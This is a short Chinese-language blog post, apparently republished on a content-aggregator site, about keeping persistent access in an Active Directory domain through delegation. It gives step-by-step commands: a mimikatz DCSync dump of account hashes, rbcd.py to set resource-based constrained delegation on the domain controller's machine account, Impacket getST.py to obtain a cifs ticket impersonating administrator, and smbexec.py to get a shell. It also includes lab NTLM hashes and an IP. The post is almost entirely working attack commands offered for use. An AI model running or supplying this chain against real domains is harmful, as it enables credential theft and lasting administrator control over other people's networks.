域内委派维权

互联网
2025-09-21 21:48:02

为某个服务账户配置 krbtgt 用户的非约束性委派或基于资源的约束性委派。这里我的 krbtgt 的基于资源约束性委派我利用不了，所以使用的是域控的机器账户 dc01$ 进行维权。

抓取所有 hash。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK /user:HACK\administrator /csv" "exit" 这里很多账号都是如下 hash，是因为他们的密码都是一样的。 9099d68602a60f007c227c4fa95fada6 9099d68602a60f007c227c4fa95fada6

给机器账户 dc01$ 配置 machine$ 的基于资源的约束性委派

python ./rbcd.py -f comp1 -t dc01 -dc-ip 192.168.72.21 HACKER\\administrator -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6

以 administrator 请求 cifs/dc01.HACK 票据

# 以 administrator 请求 cifs/dc01.HACK 票据 python3 getST.py -dc-ip 192.168.72.21 HACK /machine$ -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 -spn cifs/dc01.HACK -impersonate administrator export KRB5CCNAME=administrator@cifs_dc01.HACK @HACK.COM.ccache python3 smbexec.py -no-pass -k dc01.HACK

标签：

域内委派维权由讯客互联互联网栏目发布，感谢您对讯客互联的认可，以及对我们原创作品以及文章的青睐，非常欢迎各位朋友分享到个人网站或者朋友圈，但转载请说明文章出处“域内委派维权”

上一篇
Python高精度计算利器：decimal模块详解

下一篇
认知动力学视角下的生命优化系统：多模态机器学习框架的哲学重构